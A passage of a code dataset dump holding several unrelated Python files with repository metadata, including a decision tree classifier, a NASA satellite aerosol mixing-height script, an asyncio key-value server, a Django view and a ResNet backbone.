len(dataset[0]) == 1:\n return majority_count(class_list)\n\n best_feature = choose_best_feature_to_split(dataset=dataset)\n\n split_point = 0.0\n\n # Nếu nó là mức tối ưu nhất thì cứ tiếp tục\n if isinstance(best_feature, tuple):\n best_feature_label = str(labels[best_feature[0]]) + '<' + str(best_feature[1])\n split_point = best_feature[1]\n best_feature = best_feature[0]\n flag_series = 1\n else:\n best_feature_label = labels[best_feature]\n flag_series = 0\n\n my_tree = {best_feature_label: {}}\n\n feature_values = [example[best_feature] for example in dataset]\n\n # Xử lí giá trị liên tục\n if flag_series:\n elt_dataset, gt_dataset = split_dataset_for_series(dataset, best_feature, split_point)\n sub_labels = labels[:]\n sub_tree = create_tree(elt_dataset, sub_labels)\n my_tree[best_feature_label]['<'] = sub_tree\n\n sub_tree = create_tree(gt_dataset, sub_labels)\n my_tree[best_feature_label]['>'] = sub_tree\n\n return my_tree\n\n # Xử lí giá trị rời rạc\n else:\n del (labels[best_feature])\n unique_values = set(feature_values)\n for value in unique_values:\n sub_labels = labels[:]\n sub_tree = create_tree(split_dataset(dataset=dataset, axis=best_feature, value=value), sub_labels)\n my_tree[best_feature_label][value] = sub_tree\n return my_tree\n\n\n\n#giải phần cần tìm trong đầu tìm\ndef classify(input_tree, feature_labels, feature_label_properties, test_vec):\n first_str = list(input_tree.keys())[0]\n first_label = first_str\n less_index = str(first_str).find('<')\n # print(less_index)\n if less_index > -1: # Nếu nó là 1 tính năng liên tục\n first_label = str(first_str)[:less_index]\n # print(\"first_label\", first_label)\n second_dict = input_tree[first_str]\n feature_index = feature_labels.index(first_label) # Các tính năng ứng với các node\n # print(second_dict)\n class_label = None\n for key in second_dict.keys(): # Vòng lặp cho mỗi nhánh\n if feature_label_properties[feature_index] == 0: # Các tính năng rời rạc\n if test_vec[feature_index] == key: # Các mẫu thử nghiệm tính năng rời rạc nhập vào 1 nhánh\n if type(second_dict[key]).__name__ == 'dict': # Nhánh không phải node lá thì đệ quy\n class_label = classify(second_dict[key], feature_labels, feature_label_properties, test_vec)\n else: # Nếu là node lá thì trả về kết quả\n class_label = second_dict[key]\n else:\n split_point = float(str(first_str)[less_index + 1:])\n if test_vec[feature_index] < split_point: # Nhập cây con phía bên trái\n if type(second_dict['<']).__name__ == 'dict': # Nhánh không phải node lá thì đệ quy\n class_label = classify(second_dict['<'], feature_labels, feature_label_properties, test_vec)\n else: # Nếu là node thì trả về kết quả\n class_label = second_dict['<']\n else:\n if type(second_dict['>']).__name__ == 'dict': # Nhánh không phải node lá thì đệ quy\n class_label = classify(second_dict['>'], feature_labels, feature_label_properties, test_vec)\n else: # Nếu là lá thì trả về kết quả\n class_label = second_dict['>']\n\n return class_label\n","repo_name":"huyhoang20/id3","sub_path":"trees.py","file_name":"trees.py","file_ext":"py","file_size_in_byte":9657,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"28691998949","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Automated Satellite Mixing height Observations and Known Remote Estimations (A-SMOKRE)\n# \n# __Fall 2020 Authors/Collaborators:__ Ashwini Badgujar, Sean Cusick, Patrick Giltz, Ella Griffith, Brandy Nisbet-Wilcox, Dr. Kenton Ross, Dr. Travis Toth, Keith Weber \n# \n# __Spring 2021 Authors/Collaborators:__ Jukes Liu, Lauren Mock, Dean Berkowitz, Chris Wright, Brandy Nisbet-Wilcox, Dr. Kenton Ross, Dr. Travis Toth, Keith Weber \n# \n# __Description:__ Mixing height is critical to decision making regarding air quality forecasting as it indicates the altitude at which smoke disperses. This code allows the user to input hdf files containing vertical feature masked data from CALIPSO and receive a numeric output of the observed mixing heights. This code extracts features of relevance from the hdf file to find continuous aerosols relative to the earth’s surface. The altitude at which the aerosol ends is recorded as the mixing height, along with a matching latitude and longitude. The numeric output will include a mixing height observation at a particular location. These values can be applied as per the end user’s individual needs. \n# \n# __Functions:__ \n# - Computes mixing height values for a given CALIPSO hdf file.\n# - Plots graphs to visualize the location of aerosol, surface and attenuated data\n# - Saves the calculated mixing height values to a CSV file which gets stored at the specified location\n# \n# __Parameters:__\n# \n# In:\n# \n# - desired dates of analysis (matching_CALIPSO_transect_names.csv)\n# - latitudes of desired transects with dates (calipso_transects.csv)\n# - CALIPSO files for the corresponding dates. \n# \n# Out:\n# \n# - CSV files with the mixing height values with respective latitude and longitude (CSV file stored in specified directory, see MH_calc)\n# - Plot showing the location of the features considered (aerosol, surface/subsurface, attenuated data, clear air)\n\n# In[128]:\n\n\n# Importing all the required packages\nimport os\nimport numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nfrom scipy.interpolate import splev,splrep\nimport sys\nimport pandas as pd\nfrom pyhdf.SD import SD, SDC\n\n# Initializing variables\nos.environ[\"QT_DEVICE_PIXEL_RATIO\"] = \"0\"\nos.environ[\"QT_AUTO_SCREEN_SCALE_FACTOR\"] = \"1\"\nos.environ[\"QT_SCREEN_SCALE_FACTORS\"] = \"1\"\nos.environ[\"QT_SCALE_FACTOR\"] = \"1\"\n\n\n# ### Reclassify, Mesh, Calculate Mixing Heights\n\n# In[129]:\n\n\ndef MH_calc(feature_type2, aerosol_class2,filedate,roi_profiles, lat2, lon2, automated):\n\n # 1st dimension (rows) in the feature_type2 array : columns in figure (-1 = last column)\n # 2nd dimension (columns) in the feature_type2 array : rows in figure (-1 = last row)\n \n\n\n # Assigning numeric values to the features \n feature_type2[feature_type2 < 3], aerosol_class2[aerosol_class2 < 2] = 0,0 # other feature_type, not determined (AND MARINE)\n feature_type2[feature_type2 == 3], aerosol_class2[aerosol_class2 == 6] = 1,6 # tropospheric aerosol, smoke\n feature_type2[feature_type2 == 4], aerosol_class2[aerosol_class2 == 5] = 0,5 # other feature_type, polluted dust\n feature_type2[feature_type2 == 5], aerosol_class2[aerosol_class2 ==2] = 2,2 # surface, dust\n feature_type2[feature_type2 == 6], aerosol_class2[(aerosol_class2 > 2) & (aerosol_class2 < 5)] = 2, 3 # subsurface, continental\n feature_type2[feature_type2 == 7], aerosol_class2[(aerosol_class2 == 7)] = 3,7 # bad feature_type, other\n \n print(\"number of chunks identified as smoke aerosol\")\n print(len(aerosol_class2[(feature_type2 == 1)& (aerosol_class2 == 6)]))\n\n\n\n\n # Generate altitude feature_type according to file specification [1].\n alt = np.zeros(290) # change to altitude_levels variable\n type(alt)\n\n\n # Generating altitude data\n \n for i in range (0, 290):\n alt[i] = -0.5 + i*0.03\n\n\n\n # Contouring the feature_type on a grid of latitude vs. pressure\n latitude, altitude = np.meshgrid(lat2, alt)\n #print(altitude.shape)\n #print(latitude.shape)\n \n # if not automated return values for visualization\n #print (lat2)\n #print(alt)\n if not automated: return feature_type2, aerosol_class2, lat2, alt, lon2\n\n\n # Reversing the altitude data for calculation \n altitude_reversed = alt[::-1]\n altitude_reversed\n \n \n # --------------------------------------------------------------------------------------------------\n # Calculating the mixing heights and copying them to csv\n # Main idea here: if transition from ground to air has aerosol immediately, we keep. \n # --------------------------------------------------------------------------------------------------\n\n latitude_output = []\n longitude_output = []\n altitude_output = []\n aerosol_class_output = []\n \n for profile in range(roi_profiles):\n if feature_type2[profile][-1] != 2: # checking if last value is surface/subsurface\n continue\n # loop through the vertical profile\n first_aerosol = True\n second_aerosol = True\n for alt_index in range((len(altitude_reversed)-1), 0, -1):\n if feature_type2[profile][alt_index] == 2: # check if it is surface/subsurface\n last_value = 2\n continue\n if feature_type2[profile][alt_index] == 3:\n last_value = 3\n continue\n if feature_type2[profile][alt_index] == 1: # checking if it is aerosol\n if first_aerosol:\n aerosol_bottom = altitude_reversed[alt_index] # record the aerosol bottom\n first_aerosol = False #we are no longer looking for the first aerosol\n temp_alt = altitude_reversed[alt_index]\n temp_class = aerosol_class2[profile][alt_index]\n last_value = 1\n continue\n # when we arrive at non-aerosol, non-surface, non-attenuated feature_type...\n elif (feature_type2[profile][alt_index] == 0) & (not first_aerosol):\n # if we just emerged from an aerosol cloud, store\n # if we haven't hit aerosol yet, keep going!\n \n # If this is the second aerosol cloud, delete the last aerosol and break!\n if not second_aerosol:\n del latitude_output[-1]\n del longitude_output[-1]\n del altitude_output[-1]\n del aerosol_class_output[-1]\n break\n if last_value == 1:\n aerosol_top = altitude_reversed[alt_index] # record the aerosol top\n if ((aerosol_bottom > 0.3) & (aerosol_top > 6)) | (aerosol_bottom > 4.7) | (aerosol_top-aerosol_bottom <0.15): # if lofted or < 150m thickness\n break\n latitude_output.append(lat2[profile])\n longitude_output.append(lon2[profile])\n altitude_output.append(temp_alt)\n aerosol_class_output.append(temp_class)\n value = 'latitude :' + str(lat2[profile]) + ' longitude :' + str(lon2[profile]) + ' altitude :' + str(temp_alt) + ' aerosol_class :' + str(temp_class) # add to csv\n print(value)\n first_plume_top = aerosol_top\n second_aerosol = False\n first_aerosol = True\n \n # if we've reached a cloud, whether there was aerosol or not, break. \n # this means that contiguity with the ground is ensured.\n\n\n # Converting the feature_type to Dataframe for copying to csv \n df = pd.DataFrame(\n {'Latitude': latitude_output,\n 'Longitude': longitude_output,\n 'Altitude': altitude_output,\n 'Aerosol_Type': aerosol_class_output,\n 'Date': [filedate]*len(aerosol_class_output)\n })\n df.head()\n \n print()\n if df.shape[0] == 0:\n print(\"No MH calculated for this transect. Causes may include: data attenuation, lack of aerosol data, other\")\n \n return\n\n # ---------------------------\n # CHANGE OUTPUT FILENAME HERE\n # ---------------------------\n \n # Copying the Dataframe to csv\n # check if a csv already exists, extend that file if so.\n # MAKE SURE THE DIRECTORY IS EMPTY PRIOR TO RUNNING!\n if os.path.exists('Z:/SIHAQII/Data/Mixing_Heights/MH_'+filedate+'.csv'):\n df.to_csv('Z:/SIHAQII/Data/ASMOKRE_MH_Old/MH_'+filedate+'.csv', mode = 'a', index = False, header = False)\n else:\n df.to_csv('Z:/SIHAQII/Data/ASMOKRE_MH_Old/MH_'+filedate+'.csv', index = False, header=True)\n \n\n\n# ### Process CALIPSO file\n\n# In[130]:\n\n\n# ---------------------------\n# CHANGE: Remove all files in directory prior to executing. \n# ---------------------------\ndef Process_CALIPSO(FILE_PATH, lat_min, lat_max,filedate, automated):\n vfm_hdf = SD(FILE_PATH, SDC.READ)\n\n # Getting the feature type from hdf file\n DATAFIELD_NAME = 'Feature_Classification_Flags' # Datafield from hdf file which has features\n feature_type2D = vfm_hdf.select(DATAFIELD_NAME)\n feature_type = np.array(feature_type2D[:,:])\n #print(feature_type)\n #print(feature_type.shape)\n\n # Reading geolocation datasets.\n latitude = vfm_hdf.select('Latitude')\n lat = np.array(latitude[:])\n\n roiNDX_initial = np.where(lat >= lat_min)[0][0] \n # We want the last of the values which is less than the max lat. \n roiNDX_final = np.where(lat <= lat_max)[0][-1]\n #print(roiNDX_initial)\n #print(roiNDX_final)\n if roiNDX_initial >= roiNDX_final: \n print(\"Error: Lat range is too small. This transect will be thrown out\")\n return\n\n # Reading geolocation feature_typesets.\n longitude = vfm_hdf.select('Longitude')\n lon = np.array(longitude[:])\n #print(lon)\n\n # # Assigning the granule blocks and profile values \n granule_blocks = lat.shape[0]\n granule_profiles = profile5km * granule_blocks\n profNDX = np.array(range(granule_profiles))\n prof2blockNDX = np.array(range(7,granule_profiles,profile5km))\n bigNDX_initial = 15 * roiNDX_initial\n bigNDX_final = 15 * roiNDX_final\n\n # # Assigning spline latitude value\n spline_latitude = splrep(prof2blockNDX, lat)\n lat2 = splev(profNDX, spline_latitude)\n #print(lat2)\n\n # #Assigning spline longitude value\n spline_longitude = splrep(prof2blockNDX, lon)\n lon2 = splev(profNDX, spline_longitude)\n #print(lon2)\n\n # # Extracting Feature Type only (1-3 bits) through bitmask.\n aerosol_class = (feature_type & 0b111000000000) >> 9 # downshift by 9 places. \n feature_type = feature_type & 0b111 # store 7 as binary in variable\n\n # # Considering latitude and longitude of interest\n lat = lat[roiNDX_initial:roiNDX_final]\n lat2 = lat2[bigNDX_initial:bigNDX_final]\n lon2 = lon2[bigNDX_initial:bigNDX_final]\n roi_blocks = lat.shape[0]\n roi_profiles = lat2.shape[0]\n\n # # Extracting the feature_type from the area of interest\n feature_type2d = feature_type[roiNDX_initial:roiNDX_final, 1165:] \n aerosol_class2d = aerosol_class[roiNDX_initial:roiNDX_final, 1165:]\n \n # converting it from 3d to 2d\n # reshape b/c feature_type needs to be oriented correctly\n \n # initialize array with row for each profile and column for each altitude\n ftr = np.empty((roi_profiles, altitude_levels), int)\n atr = np.empty((roi_profiles, altitude_levels), int)\n granule_blocks = roi_blocks\n \n # step through each row (CALIPSO 5km block) of VFM data\n for block in range(granule_blocks):\n # step across each row one profile at a time\n # each row has 15 profiles of 290 altitude elements each\n for profile in range(profile5km):\n # create a running index of which profile you're on\n # for the entire region of interest\n bpNDX = block*profile5km + profile\n # calculate initial and final elements to slice out elements\n # corresponding to an individual profile\n pa_i = profile*altitude_levels\n pa_f = profile*altitude_levels + altitude_levels\n # transfer data from array organized by block\n # to array organized by profile\n ftr[bpNDX,:] = feature_type2d[block,pa_i:pa_f]\n atr[bpNDX,:] = aerosol_class2d[block,pa_i:pa_f]\n \n feature_type2 = ftr\n aerosol_class2 = atr\n\n# -------------------------------------------------------------------------------------------------------------------\n# -------------------------------------------------------------------------------------------------------------------\n# -------------------------------------------------------------------------------------------------------------------\n \n # -----------------------------------------------------------------------------------------------------------\n # Move on to reclassify data, mesh grid, loop through profiles and extract MH \n # -----------------------------------------------------------------------------------------------------------\n if not automated: \n feature_type2, aerosol_class2, lat, alt, lon = MH_calc(feature_type2, aerosol_class2,filedate,roi_profiles, lat2, lon2, automated) # see function above\n return feature_type2, aerosol_class2, lat, alt, lon\n \n MH_calc(feature_type2, aerosol_class2,filedate,roi_profiles, lat2, lon2, automated) # see function above\n\n\n# ### Automated calculation of all MH plumes:\n\n# ##### Get list of matching filenames for identified CALIPSO passes\n\n# In[132]:\n\n\n# Assigning some universal values to profiles and altitudes\nprofile5km = 15\naltitude_levels = 290\n\ncsvpath = 'Z:\\SIHAQII\\Data\\input_CSVs/' # path to the folder with the csv files\noverlap_transects_df = pd.read_csv(csvpath+'calipso_transects.csv') # read in the manually identified overlap info \ntransect_dates = overlap_transects_df['Date'] # grab the dates column\n\n# Read in the matches\nmatches_df = pd.read_csv(csvpath+'matching_CALIPSO_transect_names.csv', usecols=[1], names = ['filenames'], header = 0)\nmatches = list(matches_df['filenames']) # grab the filenames as a list\nlen(matches) # number of matches\n\n\n# ##### Read in files, call functions above\n\n# In[126]:\n\n\nFILE_DIR = 'Z:/SIHAQII/Data/CALIPSO_HDF_FILES/CALIPSO_HDFs/xfr139.larc.nasa.gov/'\ncounter = 0\nfor file in matches:\n #print(file) # print the filename\n filedate = file[30:40] # slice the string to get the date\n print(filedate)\n lat_mins = overlap_transects_df.loc[overlap_transects_df['Date'] == filedate, ['Latitude_min']] # grab the latitude mins\n lat_maxs = overlap_transects_df.loc[overlap_transects_df['Date'] == filedate, ['Latitude_max']] # grab the latitude maxs\n if len(lat_mins) > 0: # if there are matches found\n for plumen in range(0, len(lat_mins)): # loop through the latmins and latmaxs identified\n lat_minmax = [lat_mins.values[plumen][0],lat_maxs.values[plumen][0]]\n lat_min = min(lat_minmax)\n lat_max = max(lat_minmax)\n print(lat_min, lat_max)\n \n # Create filepath, call functions above\n FILE_PATH = FILE_DIR + file\n automated = True\n Process_CALIPSO(FILE_PATH, lat_min, lat_max,filedate, automated)\n counter = counter+1\nprint(\"Final number of plumes analyzed:\")\nprint(counter)\n\n\n# ### For examining just one plume:\n\n# In[139]:\n\n\n# ---------------------------------------------\n# Specify file location AND min / max latitudes\n# ---------------------------------------------\n\nFILE_DIR = 'Z:/SIHAQII/Data/Testfiles_softwarerelease/CALIPSO_test_files'\nFILE_WILD = 'CAL_LID_L2_VFM-Standard-V4-20.2006-08-16T20-29-26ZD.hdf'\nFILE_PATH= FILE_DIR + '/' + FILE_WILD\nfiledate = FILE_WILD[30:40]\n\n# # Assigning initial and final values to the latitudes\nlat_min = 48.3066\nlat_max = 48.9223\n\n# Assigning some universal values to profiles and altitudes\nprofile5km = 15\naltitude_levels = 290\n\n# letting it know to return just the one plume\nautomated = False\nfeature_type2, aerosol_class2, lat2, alt, longitude = Process_CALIPSO(FILE_PATH, lat_min, lat_max, filedate, automated)\nlatitude, altitude = np.meshgrid(lat2, alt)\n\n# only use below for diagnostics on a single plumes classifications\n#automated = True\n#Process_CALIPSO(FILE_PATH, lat_min, lat_max, filedate, automated)\n\n\n# In[140]:\n\n\nimport matplotlib\ncgfont = {'fontname': 'Century Gothic'}\nfig, ax = plt.subplots(figsize = (8,6))\ncmap = plt.get_cmap('Dark2')\nbounds = [0.,2,3.,5,6,7,8]\nticks = [1, 2.5,4,5.5,6.5,7.5]\nnorm = matplotlib.colors.BoundaryNorm(bounds, cmap.N)\na = ax.pcolor(lat2, alt, np.rot90(aerosol_class2),cmap=cmap, norm = norm, vmin=0, vmax=7)\ncbar = fig.colorbar(a, norm = norm, ticks = ticks,\n aspect = 20)\nplt.ylabel('Altitude (km AGL)',fontsize = 18, **cgfont)\nplt.xlabel('Latitude',fontsize = 18, **cgfont)\ncbar.set_ticklabels(['Und','Dust','Continental','Polluted Dust','Smoke','Other'])\n#cbar.set_title('Aerosol Type')\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"NASA-DEVELOP/MHEST","sub_path":"ASMOKRE_02.22.2021.py","file_name":"ASMOKRE_02.22.2021.py","file_ext":"py","file_size_in_byte":17572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"6455113943","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@Author: tushushu\n@Date: 2019-09-04 10:56:37\n\"\"\"\nfrom typing import List\n\n\nclass Solution:\n def singleNumber(self, nums: List[int]) -> int:\n ret = 0\n for num in nums:\n print(ret)\n ret ^= num\n print(ret)\n return ret\n\n\nif __name__ == \"__main__\":\n t = Solution()\n nums = [1, 2, 3, 2, 1, 3, 4, 5, 6, 4, 6]\n t.singleNumber(nums)\n","repo_name":"Python-Z/leetcode","sub_path":"python/136. 只出现一次的数字.py","file_name":"136. 只出现一次的数字.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"32350501087","text":"import sys\nimport asyncio\nstorage = {}\nclass ClientServerProtocol(asyncio.Protocol):\n\n def connection_made(self, transport):\n peername = transport.get_extra_info('peername')\n print('Connection from {}'.format(peername))\n self.transport = transport\n\n def data_received(self, data):\n resp = process(data.decode())\n self.transport.write(resp.encode())\n\n\ndef process(data):\n comm, pay = data.split(' ', 1)\n if comm == 'put':\n s = put(pay)\n return s\n elif comm == 'get':\n s = get(pay)\n return s\n else:\n return 'error\\nwrong command\\n\\n'\n\ndef put(data):\n name,value, time = data.split()\n if name not in storage:\n storage[name] = {}\n storage[name].update({time: value})\n\n else:\n storage[name].update({time: value})\n return 'ok\\n\\n'\n\n\ndef get(data):\n\n ky = data.strip()\n if ky == '*':\n response = 'ok\\n'\n for ky, val in storage.items():\n for v in sorted(val):\n response += '%s %s %s\\n' % (ky, val[v], v)\n response += '\\n'\n return response\n else:\n values = storage.get(ky)\n if values:\n response = 'ok\\n'\n for v in sorted(values):\n response += '%s %s %s\\n' % (ky, values[v], v)\n response += '\\n'\n return response\n else:\n return 'ok\\n\\n'\n\n\ndef run_server(host,port):\n loop = asyncio.get_event_loop()\n coro = loop.create_server(ClientServerProtocol,host, port)\n server = loop.run_until_complete(coro)\n try:\n loop.run_forever()\n except KeyboardInterrupt:\n pass\n server.close()\n loop.run_until_complete(server.wait_closed())\n loop.close()\n\nif __name__ == \"__main__\":\n host, port = sys.argv[1:]\n run_server(host, port)\n\n'''\n def data_received(self, data):\n output = \"error\\nwrong command\\n\\n\"\n peername = self.transport.get_extra_info('peername')[1]\n #message = process_data(data.decode())\n message = data.decode()\n print('Data received: {!r}'.format(message))\n rm = message.split(\"\\n\").remove('')\n if isinstance(rm, list):\n for i in message.split(\"\\n\"):\n if i.split()[0]==\"put\":\n print(i)\n output = self.upload_data(peername,i)\n #print(data_base)\n self.transport.write(output.encode())\n if i.split()[0]==\"get\":\n output = self.data_transmitted(peername,i)\n print(output.encode())\n self.transport.write(output.encode())\n else:\n if str(rm).split()[0]==\"put\":\n print(i)\n output = self.upload_data(peername,rm)\n #print(data_base)\n self.transport.write(output.encode())\n if str(rm).split()[0]==\"get\":\n output = self.data_transmitted(peername,rm)\n print(output.encode())\n self.transport.write(output.encode())\n self.transport.write(output.encode())\n'''\n'''\n def upload_data(self,peername,data):\n data = data.split(\"\\n\")\n data = data[4:]\n print(data)\n\n if data_base.get(peername) == None:\n data_base[peername]=[]\n data_base[peername].append(data)\n else:\n data_base[peername].append(data)\n\n data = data[4:]\n print(data)\n return \"ok\\n\\n\"\n'''\n\n'''\n def data_transmitted(self,peername,data):\n #Успешный ответ от сервера:\n #ok\\npalm.cpu 10.5 1501864247\\neardrum.cpu 15.3 1501864259\\n\\n\n output = \"\"\n g = data.split()\n if data_base.get(peername) == None:\n return \"ok\\n\\n\"\n else:\n if g[1] == \"*\":\n for i in data_base[peername]:\n output= output+f'{i}\\n'\n else:\n for i in data_base[peername]:\n if g[1] == i.split()[0]:\n output = output + f'{i}\\n'\n\n print('ok\\n'+output+'\\n')\n return 'ok\\n'+output+'\\n'\n'''\n","repo_name":"diekaltesonne/Python_course","sub_path":"Погружение_в_Python/WEEK_6/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":4159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"4358221366","text":"from django.shortcuts import render\nfrom django.forms.formsets import formset_factory\nfrom django.contrib import messages\n\n# Create your views here.\nfrom testapp.apps.compare.forms import InputForm\n\n\ndef index(request):\n form_string_set = formset_factory(InputForm, extra=4)\n if request.method == 'POST':\n form = form_string_set(request.POST, prefix='String')\n data =[]\n if form.is_valid():\n for form_string in form:\n\n data.append(form_string.get_string())\n\n data = filter(None, data)\n numOfStrings = len(data)\n data.sort(key=len)\n max =[]\n for i in range(numOfStrings-1):\n leastStr = data.pop(0)\n maxSharedStr = ''\n\n while len(leastStr) > len(maxSharedStr):\n robTestStr = leastStr\n while len(robTestStr) > len(maxSharedStr):\n numOfConcidence = 0\n for compatStr in data:\n if robTestStr in compatStr:\n numOfConcidence += 1\n\n if numOfConcidence >= 2 and len(robTestStr) > len(maxSharedStr):\n maxSharedStr = robTestStr\n max.append(robTestStr)\n robTestStr = robTestStr[:-1]\n leastStr = leastStr[1:]\n max.sort(key=len, reverse=True)\n if max:\n return render(request, 'compare/index.html', {'form': form, 'result':max[0]})\n else:\n messages.add_message(request, messages.ERROR, \"No duble\")\n return render(request, 'compare/index.html', {'form': form})\n else:\n messages.add_message(request, messages.ERROR, \"Error.\")\n return render(request, 'compare/index.html', {'form': form})\n else:\n form = form_string_set(prefix='String')\n return render(request, 'compare/index.html', {'form': form})\n\n","repo_name":"yvkalabuha/testapp","sub_path":"testapp/apps/compare/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"1081473108","text":"# 태극 문양 애니메이션 만들기\nimport turtle\n\nt = turtle.Turtle()\nt.reset()\n\ndef draw_shape(radius, color1):\n t.left(270)\n t.width(3)\n t.color(\"black\", color1)\n t.begin_fill()\n t.circle(radius/2.0, -180)\n t.circle(radius, -180)\n t.left(180)\n t.circle(-radius/2.0, -180)\n t.end_fill()\n\ndraw_shape(200, \"red\")\nt.setheading(180)\ndraw_shape(200, \"blue\")","repo_name":"wnsgur1198/python_practice","sub_path":"ex4.py","file_name":"ex4.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"1746615886","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport math\nfrom scipy.optimize import lsq_linear\nlattice=open(\"lattice.txt\",\"w\")\nsqn=70\nwhile(sqn<=300):\n\tnodes=sqn**2\n\tlbmax=2*(sqn-1)+1\n\tcil=np.zeros([nodes,lbmax])\n\tused=[0]*nodes\n\tfor lb in range (0,lbmax):\n for i in range (1,nodes):\n used=[0]*nodes\n for j in range(0,i):\n if abs(i-j)/sqn+abs(i-j)%sqn>lb:\n used[int(cil[j][lb])]=1\n for col in range(0,nodes):\n if used[col]==0:\n cil[i][lb]=col\n break \n\t#Number of boxes required\n\tnb=np.amax(cil,0)+1\n\ty=np.transpose([math.log(i) for i in nb])\n\tlboxes=range(1,lbmax+1)\n\tllboxes=[-math.log(i) for i in lboxes]\n\tA=np.column_stack(([1]*lbmax, llboxes))\n\t#print(A)\n\tlsq=lsq_linear(A,y)\n\tk=np.exp(lsq.x[0])\n\ttfd=lsq.x[1]\n\tfitted=[k*(1.0/lbox)**tfd for lbox in lboxes]\n\tlattice.write(str(sqn)+\" \"+str(tfd)+\"\\n\")\n\tprint(sqn, tfd)\n\tsqn+=10\n\n#plt.figure(1)\n#plt.loglog(lboxes,nb,'.')\n#plt.loglog(lboxes,fitted,'-')\n\n","repo_name":"giorkala/Protein-Protein-Interaction-Networks-Project","sub_path":"2.TFD_Calculation/lattice2.py","file_name":"lattice2.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"72503270919","text":"from argparse import ArgumentParser, Namespace\nimport torch\nimport torch.nn as nn\n\nfrom datasets import ContinualDatasetInfo\nfrom compressors import CompressorDecompressorInfo\nfrom backbones.layers import ConvBlock, FinalBlock\n\n\n\ndef add_backbone_args(parser: ArgumentParser):\n parser.add_argument('--backbone_block', type=float, default=0, required=False, help='after which block to cut the resnet. Use 0 to use the whole resnet')\n\n\nclass BasicBlock(nn.Module):\n expansion = 1\n\n def __init__(self, opt, inChannels, outChannels, stride=1, downsample=None):\n \"\"\"Building Block of resnet consisting of two conv-layers and a shortcut\"\"\"\n super().__init__()\n self.downsample = downsample\n expansion = 1\n self.conv1 = ConvBlock(opt=opt, in_channels=inChannels, out_channels=outChannels, kernel_size=3, stride=stride, padding=1, bias=False)\n self.conv2 = ConvBlock(opt=opt, in_channels=outChannels, out_channels=outChannels*expansion, kernel_size=3, stride=1, padding=1, bias=False)\n\n def forward(self, x):\n _out = self.conv1(x)\n _out = self.conv2(_out)\n if self.downsample is not None:\n shortcut = self.downsample(x)\n else:\n shortcut = x\n _out = _out + shortcut\n return _out\n\nclass ResidualBlock(nn.Module):\n def __init__(self, opt, block, inChannels, outChannels, depth, stride=1):\n super().__init__()\n if stride != 1 or inChannels != outChannels * block.expansion:\n downsample = ConvBlock(opt=opt, in_channels=inChannels, out_channels=outChannels* block.expansion, kernel_size=1, stride=stride, padding=0, bias=False)\n else:\n downsample = None\n self.blocks = nn.Sequential()\n self.blocks.add_module('block0', block(opt, inChannels, outChannels, stride, downsample))\n inChannels = outChannels * block.expansion\n for i in range(1, depth):\n self.blocks.add_module('block{}'.format(i), block(opt, inChannels, outChannels))\n\n def forward(self, x):\n return self.blocks(x)\n\nclass PartialResidualBlock(nn.Module):\n def __init__(self, opt, block, inChannels, outChannels, depth, stride=1):\n assert depth==2\n super().__init__()\n self.blocks = nn.Sequential()\n inChannels = outChannels * block.expansion\n for i in range(1, depth):\n self.blocks.add_module('block{}'.format(i), block(opt, inChannels, outChannels))\n\n def forward(self, x):\n return self.blocks(x)\n\n\n\nclass Resnet(nn.Module):\n def __init__(self, opt: Namespace, dataset_info: ContinualDatasetInfo, compressor_info: CompressorDecompressorInfo):\n \"\"\"resnet 18. It is possible to cut off layers form the front.\"\"\"\n super().__init__()\n self.cut_layer = opt.backbone_block\n num_blocks = [2, 2, 2, 2]\n block = BasicBlock\n in_planes, out_planes = 64, 512 #20, 160\n\n self.num_classes = dataset_info.num_classes\n initial = ConvBlock(opt=opt, in_channels=compressor_info.out_channels, out_channels=in_planes, kernel_size=3, stride=1, padding=1)\n group1 = ResidualBlock(opt=opt, block=block, inChannels=64, outChannels=64, depth=num_blocks[0], stride=1) #For ResNet-S, convert this to 20,20\n group2 = ResidualBlock(opt=opt, block=block, inChannels=64*block.expansion, outChannels=128, depth=num_blocks[1], stride=2) #For ResNet-S, convert this to 20,40\n group3 = ResidualBlock(opt=opt, block=block, inChannels=128*block.expansion, outChannels=256, depth=num_blocks[2], stride=2) #For ResNet-S, convert this to 40,80\n group3_partial = PartialResidualBlock(opt=opt, block=block, inChannels=128*block.expansion, outChannels=256, depth=num_blocks[2], stride=2) #For ResNet-S, convert this to 40,80\n group4 = ResidualBlock(opt=opt, block=block, inChannels=256*block.expansion, outChannels=512, depth=num_blocks[3], stride=2) #For ResNet-S, convert this to 80,160\n group4_partial = PartialResidualBlock(opt=opt, block=block, inChannels=256*block.expansion, outChannels=512, depth=num_blocks[3], stride=2) #For ResNet-S, convert this to 80,160\n self.pool = nn.AdaptiveAvgPool2d(1)\n self.final = FinalBlock(num_classes=dataset_info.num_classes, opt=opt, in_channels=out_planes*block.expansion)\n\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n\n if self.cut_layer == 0:\n self.blocks = nn.Sequential(\n initial,\n group1,\n group2,\n group3,\n group4\n )\n elif self.cut_layer == 1:\n self.blocks = nn.Sequential(\n group2,\n group3,\n group4\n )\n elif self.cut_layer == 2:\n self.blocks = nn.Sequential(\n group3,\n group4\n )\n elif self.cut_layer == 